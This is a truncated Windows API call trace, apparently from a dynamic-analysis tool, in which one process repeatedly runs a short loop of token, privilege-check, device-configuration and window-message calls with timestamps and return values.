[0085.106] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.106] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.106] SetLastError (dwErrCode=0x522) [0085.106] CloseHandle (hObject=0x114) returned 1 [0085.106] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.106] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.106] GetLastError () returned 0x578 [0085.106] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.106] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.106] GetCurrentThread () returned 0xfffffffe [0085.106] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.106] GetLastError () returned 0x3f0 [0085.106] GetCurrentProcess () returned 0xffffffff [0085.106] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.107] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.107] SetLastError (dwErrCode=0x522) [0085.107] CloseHandle (hObject=0x114) returned 1 [0085.107] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.107] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.107] GetLastError () returned 0x578 [0085.107] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.107] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.107] GetCurrentThread () returned 0xfffffffe [0085.107] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.107] GetLastError () returned 0x3f0 [0085.107] GetCurrentProcess () returned 0xffffffff [0085.107] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.107] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.107] SetLastError (dwErrCode=0x522) [0085.107] CloseHandle (hObject=0x114) returned 1 [0085.107] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.107] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.107] GetLastError () returned 0x578 [0085.107] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.107] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.107] GetCurrentThread () returned 0xfffffffe [0085.107] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.107] GetLastError () returned 0x3f0 [0085.107] GetCurrentProcess () returned 0xffffffff [0085.107] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.107] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.107] SetLastError (dwErrCode=0x522) [0085.107] CloseHandle (hObject=0x114) returned 1 [0085.107] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.107] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.107] GetLastError () returned 0x578 [0085.107] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.107] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.108] GetCurrentThread () returned 0xfffffffe [0085.108] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.108] GetLastError () returned 0x3f0 [0085.108] GetCurrentProcess () returned 0xffffffff [0085.108] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.108] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.108] SetLastError (dwErrCode=0x522) [0085.108] CloseHandle (hObject=0x114) returned 1 [0085.108] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.108] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.108] GetLastError () returned 0x578 [0085.108] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.108] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.108] GetCurrentThread () returned 0xfffffffe [0085.108] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.108] GetLastError () returned 0x3f0 [0085.108] GetCurrentProcess () returned 0xffffffff [0085.108] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.108] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.108] SetLastError (dwErrCode=0x522) [0085.108] CloseHandle (hObject=0x114) returned 1 [0085.108] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.108] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.108] GetLastError () returned 0x578 [0085.108] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.108] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.108] GetCurrentThread () returned 0xfffffffe [0085.108] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.108] GetLastError () returned 0x3f0 [0085.108] GetCurrentProcess () returned 0xffffffff [0085.108] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.108] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.108] SetLastError (dwErrCode=0x522) [0085.108] CloseHandle (hObject=0x114) returned 1 [0085.108] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.108] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.109] GetLastError () returned 0x578 [0085.109] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.109] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.109] GetCurrentThread () returned 0xfffffffe [0085.109] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.109] GetLastError () returned 0x3f0 [0085.109] GetCurrentProcess () returned 0xffffffff [0085.109] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.109] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.109] SetLastError (dwErrCode=0x522) [0085.109] CloseHandle (hObject=0x114) returned 1 [0085.109] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.109] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.109] GetLastError () returned 0x578 [0085.109] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.109] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.109] GetCurrentThread () returned 0xfffffffe [0085.109] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.109] GetLastError () returned 0x3f0 [0085.109] GetCurrentProcess () returned 0xffffffff [0085.109] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.109] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.109] SetLastError (dwErrCode=0x522) [0085.109] CloseHandle (hObject=0x114) returned 1 [0085.109] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.109] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.109] GetLastError () returned 0x578 [0085.109] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.109] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.109] GetCurrentThread () returned 0xfffffffe [0085.109] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.109] GetLastError () returned 0x3f0 [0085.109] GetCurrentProcess () returned 0xffffffff [0085.109] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.109] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.110] SetLastError (dwErrCode=0x522) [0085.110] CloseHandle (hObject=0x114) returned 1 [0085.110] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.110] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.110] GetLastError () returned 0x578 [0085.110] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.110] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.110] GetCurrentThread () returned 0xfffffffe [0085.110] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.110] GetLastError () returned 0x3f0 [0085.110] GetCurrentProcess () returned 0xffffffff [0085.110] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.110] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.110] SetLastError (dwErrCode=0x522) [0085.110] CloseHandle (hObject=0x114) returned 1 [0085.110] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.110] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.110] GetLastError () returned 0x578 [0085.110] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.204] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.204] GetCurrentThread () returned 0xfffffffe [0085.204] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.204] GetLastError () returned 0x3f0 [0085.204] GetCurrentProcess () returned 0xffffffff [0085.204] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.204] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.204] SetLastError (dwErrCode=0x522) [0085.204] CloseHandle (hObject=0x114) returned 1 [0085.204] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.204] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.204] GetLastError () returned 0x578 [0085.204] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.204] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.204] GetCurrentThread () returned 0xfffffffe [0085.204] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.204] GetLastError () returned 0x3f0 [0085.204] GetCurrentProcess () returned 0xffffffff [0085.204] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.204] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.204] SetLastError (dwErrCode=0x522) [0085.204] CloseHandle (hObject=0x114) returned 1 [0085.204] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.204] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.204] GetLastError () returned 0x578 [0085.204] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.205] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.205] GetCurrentThread () returned 0xfffffffe [0085.205] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.205] GetLastError () returned 0x3f0 [0085.205] GetCurrentProcess () returned 0xffffffff [0085.205] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.205] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.205] SetLastError (dwErrCode=0x522) [0085.205] CloseHandle (hObject=0x114) returned 1 [0085.205] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.205] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.205] GetLastError () returned 0x578 [0085.205] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.205] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.205] GetCurrentThread () returned 0xfffffffe [0085.205] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.205] GetLastError () returned 0x3f0 [0085.205] GetCurrentProcess () returned 0xffffffff [0085.205] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.205] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.205] SetLastError (dwErrCode=0x522) [0085.205] CloseHandle (hObject=0x114) returned 1 [0085.205] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.205] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.205] GetLastError () returned 0x578 [0085.205] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.205] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.205] GetCurrentThread () returned 0xfffffffe [0085.205] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.205] GetLastError () returned 0x3f0 [0085.205] GetCurrentProcess () returned 0xffffffff [0085.205] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.205] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.205] SetLastError (dwErrCode=0x522) [0085.205] CloseHandle (hObject=0x114) returned 1 [0085.205] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.205] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.205] GetLastError () returned 0x578 [0085.206] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.206] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.206] GetCurrentThread () returned 0xfffffffe [0085.206] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.206] GetLastError () returned 0x3f0 [0085.206] GetCurrentProcess () returned 0xffffffff [0085.206] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.206] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.206] SetLastError (dwErrCode=0x522) [0085.206] CloseHandle (hObject=0x114) returned 1 [0085.206] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.206] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.206] GetLastError () returned 0x578 [0085.206] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.206] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.206] GetCurrentThread () returned 0xfffffffe [0085.206] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.206] GetLastError () returned 0x3f0 [0085.206] GetCurrentProcess () returned 0xffffffff [0085.206] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.206] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.206] SetLastError (dwErrCode=0x522) [0085.206] CloseHandle (hObject=0x114) returned 1 [0085.206] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.206] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.206] GetLastError () returned 0x578 [0085.206] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.206] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.206] GetCurrentThread () returned 0xfffffffe [0085.206] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.206] GetLastError () returned 0x3f0 [0085.206] GetCurrentProcess () returned 0xffffffff [0085.206] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.206] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.207] SetLastError (dwErrCode=0x522) [0085.207] CloseHandle (hObject=0x114) returned 1 [0085.207] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.207] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.207] GetLastError () returned 0x578 [0085.207] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.207] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.207] GetCurrentThread () returned 0xfffffffe [0085.207] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.207] GetLastError () returned 0x3f0 [0085.207] GetCurrentProcess () returned 0xffffffff [0085.207] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.207] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.207] SetLastError (dwErrCode=0x522) [0085.207] CloseHandle (hObject=0x114) returned 1 [0085.207] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.207] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.207] GetLastError () returned 0x578 [0085.207] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.207] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.207] GetCurrentThread () returned 0xfffffffe [0085.207] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.207] GetLastError () returned 0x3f0 [0085.207] GetCurrentProcess () returned 0xffffffff [0085.207] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.207] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.207] SetLastError (dwErrCode=0x522) [0085.207] CloseHandle (hObject=0x114) returned 1 [0085.207] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.207] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.207] GetLastError () returned 0x578 [0085.207] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.207] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.207] GetCurrentThread () returned 0xfffffffe [0085.207] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.208] GetLastError () returned 0x3f0 [0085.208] GetCurrentProcess () returned 0xffffffff [0085.208] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.208] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.208] SetLastError (dwErrCode=0x522) [0085.208] CloseHandle (hObject=0x114) returned 1 [0085.208] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.208] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.208] GetLastError () returned 0x578 [0085.208] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.208] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.208] GetCurrentThread () returned 0xfffffffe [0085.208] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.208] GetLastError () returned 